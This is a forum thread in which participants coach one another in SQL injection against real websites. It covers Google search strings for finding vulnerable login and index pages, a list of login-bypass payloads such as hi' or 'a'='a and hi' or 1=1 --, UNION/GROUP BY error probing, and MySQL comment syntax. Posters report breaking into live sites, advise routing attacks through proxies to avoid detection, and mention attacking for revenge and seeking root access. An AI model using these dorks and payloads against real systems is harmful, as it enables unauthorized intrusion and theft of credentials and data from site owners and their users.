try searching for

admin/logins.asp, or login.php , index.asp?query= , or index.asp?id= ,or index.asp?page= , or adminphp

2. you wont be able to create a table from the url...but if you get an error from the page ..it will show you paths to the password file...like USER not found in HOME etc.etc...you can track each error out put to the admin password..by including the paths in the url...more details in the sql injection tuts at my place

3

I am reading up on it all over the place and i know there are plenty of tuts on it over at comsec.governmentsecurity.com yet still i am a little unclear on things.
Perhaps its information overload that i am having. Its pretty late here so bear with me.

Anyways, here goes:

1. Finding vulnerable machines. What i am doing is using google to search for strings like, allinurl:index.asp?story= or allinurl:index.asp?forumid= etc to try and get some hits on sql servers for me to try and inject something.

2. Finding a few machines there i proceed to try and create a few errors. My first step is to try and add a fictitious column. For example: http://www.whatever.com/index.asp?story=1 AND huh=1
With that i am hoping to return an error which will refer to soemthign about an invalid column name. Sometimes i can get this.

3. For a next step i try to crate an error using '. For example: http://www.whatever.com/index.asp?story=1'
Again trying to get an error. which sort of works sometimes also.

4. From here it gets a little fuzzy. I would think i need to do some database footprinting of some sort using the HAVING and GROUP BY command. To this part i havent gotten yet.

EDIT: i think i am getting soemwhere. I am adding HAVING and GROUP BY until i am displaying the page error free...
/me is still struggelling on

QUESTIONS:
a) Is there an easier way to find targettable machines.
is footprinting the right way to go after that?
c) anything else i should keep my eye out for?

I know that i must be taking a slow route but i dont really want to automate everything yet until i really understand whats going on.

I hope these questions arent gonna waste anyones time. In the mean time i will be going through the tutorials again for more research.

Thx for any help...

in the login field : admin

in the password field : hi' or 'a'='a

i tried it and worked on 2 out of 4 sites found on google with login.asp in the URL.


*edited by me*

after going through some other login pages a lot of guys def need to secure their databases...

heres an sql injections text

Thx for hte reply guys.

Comsec, the ../../../../../ is that traversal bug right? I thought that was only on older versions? I've not had any luck with it as yet.

BUT, just doing a search for: inurl:admin/login.asp turned up a lot of good results. I then went the root of filling in for:
Login: admin
Password: hi' or 'a'='a

And i got my first result! It hit me as a surprise. I was so dubious of it that i hadnt even bothered to fire up my Multiproxy Suffice to say i was/am happy.

I think i'll try this way a little longer and hopefully turn up some more results.

QUESTIONS:
1) In the login field i can put in any name right?
2) Is the key to it having plenty of injection strings to put in the pwd field? And then it will evntually work? Or is it more a case of hit and miss?
3) Is manipulating the URL directly with HAVING, UNION, GROUP BY etc etc worth trying/getting the hang of?

>Shortcut, thx for spelling it out in laymans terms to me, indeed i got a few results already ;-)

Atomix, thx for the good txt. Good read.

Right, gonna get on with some more now.

Congrats on your success!!

word of advice tho... even if u dont think its gonna work, use a proxy. Lets suppose you try a few attempts at sql injection, without success, then remember u arent using a proxy. Then u connect thru a proxy and keep trying til it works. If your an admin, and someone enters wierd logins, that dont work, then 5 min later someone breaks into the site thru a proxy.... he is likely to be smart enough to put 2 and 2 together.

Now a days it is just a good idea in general to use a proxy due to the high volume of spyware, etc. Anonymity (sp?) is a wonderful thing. Use it when at all possible.

Onenight

Hi,

since iam nearly at the same point as OneNight, please let me throw in one more question:

All tutorials i found so far are for MS SQL server, So the "End Query" -- and the UNION keyword will work there.

But how would yopu approach a mySQL Injection ? I tried many sites with more or less success, but since mysql has little different Snytax than MS SQL has, I e.g. dont know whats a "union" Like keyword for mySQL is. also - - for ending a query wont wokr , as far as i know /* (OR */) will do ?! GROUP BY will work on both as afar as i know ?!

But i have a site in which i can inejct a "LIMIT x,y" so get more records per page if I end this query with /* (OR */)...but if i try to inject ANY other command there i always ger "you have a Errro in your sql blablabla"...

Other problems i have is with "select pass as username"...which should give me the passes instead of the usernames in the output list. I either get a sql error too, or if I try to execute this as 2nd query to overwrite the username-var from the first query (with ; at the beginnign) i dont get a error but also i dont get a output anymore I think the problem is that only the output of the frist record set is printed and my 2nd SQL Query will return a 2nd recordset which is never touched (just my thought).


If anyone can help me there are knows of a good mySQL tutorial pls let me know

thx in advance
Ray

OneNight :

Yes you can try these ones from the tutorial posted in a previous reply :

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

anything ' --
anything " --


If you are not targeting one database in particular, then i suggest only trying the easy injections and move on to the next page and so on... for practice and to help out admins. BUT if you want to penetrate a database (revenge or somehting) you might obviously try all the manipulation techniques you read about and USE A PROXY.

Good luck!

Yup, all the info you'll need to get you started and take ayou quite a way in sql injection is right here in this site! Oh, and this one helped a lot also: Haitchttp://www.securiteam.com/securityreviews/5DP0N1P76E.html.

Its nice to make progress in it but at the moment i am still just running along with the masses. Just make a massive search on google and then picking off the sites that are wide open. I think i'll see if i cant delve into it any deeper to either:

1) actually pick a site to try and hack which doesnt have any obvious flaws.

2) get root access to the server on which the database is located.

I guess i'll be doing a lot more reading then

I had some othe stuff to write but i have forgotten what nm...

Laters.